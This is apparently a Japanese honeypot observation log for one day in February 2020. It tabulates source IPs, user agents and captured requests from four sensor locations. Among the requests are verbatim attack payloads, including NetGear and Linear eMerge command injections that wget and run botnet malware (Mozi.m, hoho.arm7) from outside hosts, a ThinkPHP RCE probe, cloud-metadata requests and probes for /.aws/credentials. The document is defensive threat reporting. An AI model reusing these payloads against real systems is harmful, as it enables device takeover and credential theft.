ハニーポット(仮) 観測記録 2020/02/03分です。
特徴
Location:JP
Shenzhen TVT製品の脆弱性を狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
AWS Security Scannerによるスキャン行為
/.aws/credentialsへのスキャン行為
18[.]179[.]20[.]5に関する不正通信
を確認しました。
Location:US
Shenzhen TVT製品の脆弱性を狙うアクセス
/.envへのスキャン行為
/.git/configへのスキャン行為
を確認しました。
Location:UK
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Shenzhen TVT製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
/.aws/credentialsへのスキャン行為
Apache Solrへのスキャン行為
を確認しました。
Location:SG
Linear eMerge E3製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Shenzhen TVT製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
123[.]125[.]114[.]144に関する不正通信
を確認しました。
他
アクセス数推移
JP:総アクセス数:56 (前日比:-50)
US:総アクセス数:18 (前日比:-14)
UK:総アクセス数:23 (前日比:-3)
SG:総アクセス数:27 (前日比:+6)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 120.132.3.65 | China |
1 | 120.41.186.122 | China |
1 | 13.53.167.81 | Sweden |
1 | 13.53.175.104 | Sweden |
1 | 147.158.48.11 | Malaysia |
8 | 154.113.16.226 | Nigeria |
1 | 175.144.244.192 | Malaysia |
1 | 185.156.177.50 | Russia |
1 | 189.154.108.123 | Mexico |
1 | 220.130.38.76 | Taiwan |
1 | 27.78.90.69 | Vietnam |
1 | 34.241.173.245 | Ireland |
34 | 44.224.22.196 | United States |
1 | 46.166.187.111 | Netherlands |
2 | 49.233.66.116 | China |
UserAgent一覧
件数 | UserAgent |
---|---|
26 | - |
1 | ApiTool |
14 | AWS Security Scanner |
3 | curl/7.47.0 |
11 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
1 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
5 | - | ||
10 | CONNECT | 18[.]179[.]20[.]5:80 | HTTP/1.0 |
3 | GET | /.aws/credentials | HTTP/1.1 |
1 | GET | /elrekt.php | HTTP/1.1 |
1 | GET | /html/public/index.php | HTTP/1.1 |
2 | GET | http://169[.]254[.]169[.]254/ | HTTP/1.1 |
2 | GET | http://169[.]254[.]169[.]254/latest/dynamic/instance-identity/document | HTTP/1.1 |
2 | GET | http://example[.]com/ | HTTP/1.1 |
2 | GET | http://[::ffff:a9fe:a9fe]/ | HTTP/1.1 |
2 | GET | http://[::ffff:a9fe:a9fe]/latest/dynamic/instance-identity/document | HTTP/1.1 |
1 | GET | http://www[.]qq[.]com/404/search_children.js | HTTP/1.1 |
1 | GET | /index.php | HTTP/1.1 |
4 | GET | /latest/dynamic/instance-identity/document | HTTP/1.1 |
1 | GET | /public/index.php | HTTP/1.1 |
1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/html/public/index.php | HTTP/1.1 |
2 | GET | /TP/index.php | HTTP/1.1 |
3 | GET | /TP/public/index.php | HTTP/1.1 |
1 | POST | /editBlackAndWhiteList | HTTP/1.1 |
1 | \x03 | ||
10 | \x16\x03\x01 |
Location:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 172.104.242.173 | United States |
1 | 183.129.159.243 | China |
1 | 187.110.252.119 | Brazil |
1 | 187.234.79.244 | Mexico |
1 | 222.186.19.221 | China |
1 | 45.136.108.64 | Germany |
1 | 46.166.187.111 | Netherlands |
3 | 51.158.118.213 | France |
1 | 60.191.20.213 | China |
1 | 79.10.158.118 | Italy |
4 | 89.248.174.146 | Netherlands |
1 | 94.60.15.3 | Portugal |
1 | 99.1.237.68 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
9 | - |
3 | ApiTool |
4 | Go-http-client/1.1 |
2 | Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
5 | - | ||
1 | CONNECT | ip[.]ws[.]126[.]net:443 | HTTP/1.1 |
2 | CONNECT | www[.]baidu[.]com:443 | HTTP/1.0 |
1 | GET | /.env | HTTP/1.1 |
1 | GET | /.git/config | HTTP/1.1 |
1 | GET | ../../ | HTTP |
2 | GET | ../../proc/ | HTTP |
1 | GET | /v2/_catalog | HTTP/1.1 |
3 | POST | /editBlackAndWhiteList | HTTP/1.1 |
1 | \x03 |
Location:UK
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 1.0.244.148 | Thailand |
1 | 106.124.178.81 | China |
1 | 13.48.85.19 | Sweden |
1 | 172.104.242.173 | United States |
1 | 18.184.218.237 | United States |
1 | 185.156.177.50 | Russia |
1 | 189.139.59.37 | Mexico |
1 | 193.57.40.38 | Ukraine |
1 | 217.13.219.254 | Russia |
1 | 222.186.19.221 | China |
1 | 46.166.187.111 | Netherlands |
5 | 5.101.0.209 | Russia |
2 | 63.143.35.226 | United States |
1 | 63.35.179.39 | Ireland |
1 | 79.112.160.108 | Romania |
2 | 89.248.174.146 | Netherlands |
1 | 93.170.48.5 | Ukraine |
UserAgent一覧
件数 | UserAgent |
---|---|
11 | - |
2 | ApiTool |
3 | curl/7.47.0 |
1 | Go-http-client/1.1 |
6 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
6 | - | ||
1 | CONNECT | ip[.]ws[.]126[.]net:443 | HTTP/1.1 |
2 | GET | /?a=fetch&content= |
HTTP/1.1 |
3 | GET | /.aws/credentials | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
1 | GET | ../../proc/ | HTTP |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://106[.]124[.]178[.]81:48505/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
2 | HEAD | /robots.txt | HTTP/1.0 |
2 | POST | /editBlackAndWhiteList | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | \x03 |
Location:SG
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 104.40.242.46 | United States |
1 | 106.59.245.133 | China |
1 | 110.177.82.71 | China |
1 | 110.177.86.216 | China |
1 | 110.80.153.220 | China |
1 | 117.15.94.25 | China |
1 | 119.237.200.226 | Hong Kong |
1 | 1.202.112.123 | China |
1 | 123.160.234.46 | China |
1 | 171.34.178.171 | China |
1 | 171.34.178.32 | China |
1 | 172.104.242.173 | United States |
1 | 177.191.161.234 | Brazil |
1 | 185.156.177.50 | Russia |
1 | 222.186.19.221 | China |
1 | 36.32.3.135 | China |
1 | 46.166.187.111 | Netherlands |
5 | 5.101.0.209 | Russia |
1 | 58.249.98.176 | China |
1 | 87.11.218.80 | Italy |
1 | 88.61.0.93 | Italy |
2 | 89.248.174.146 | Netherlands |
UserAgent一覧
件数 | UserAgent |
---|---|
7 | - |
2 | ApiTool |
1 | Go-http-client/1.1 |
1 | Mozilla/5.0 |
1 | Mozilla/5.01719037 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36 |
5 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
6 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 |
4 | PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
4 | - | ||
1 | CONNECT | cn[.]bing[.]com:443 | HTTP/1.1 |
1 | CONNECT | ip[.]ws[.]126[.]net:443 | HTTP/1.1 |
1 | CONNECT | www[.]baidu[.]com:443 | HTTP/1.1 |
1 | CONNECT | www[.]ipip[.]net:443 | HTTP/1.1 |
1 | CONNECT | www[.]voanews[.]com:443 | HTTP/1.1 |
1 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /card_scan_decoder.php?No=30&door=%60wget http://switchnets[.]net/hoho.arm7; | |
1 | GET | http://boxun[.]com/ | HTTP/1.1 |
1 | GET | http://www[.]123cha[.]com/ | HTTP/1.1 |
1 | GET | http://www[.]epochtimes[.]com/ | HTTP/1.1 |
1 | GET | http://www[.]minghui[.]org/ | HTTP/1.1 |
1 | GET | http://www[.]rfa[.]org/english/ | HTTP/1.1 |
1 | GET | http://www[.]wujieliulan[.]com/ | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
1 | GET | ../../proc/ | HTTP |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /webdav/ | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | HEAD | http://123[.]125[.]114[.]144/ | HTTP/1.1 |
2 | POST | /editBlackAndWhiteList | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | \x03 |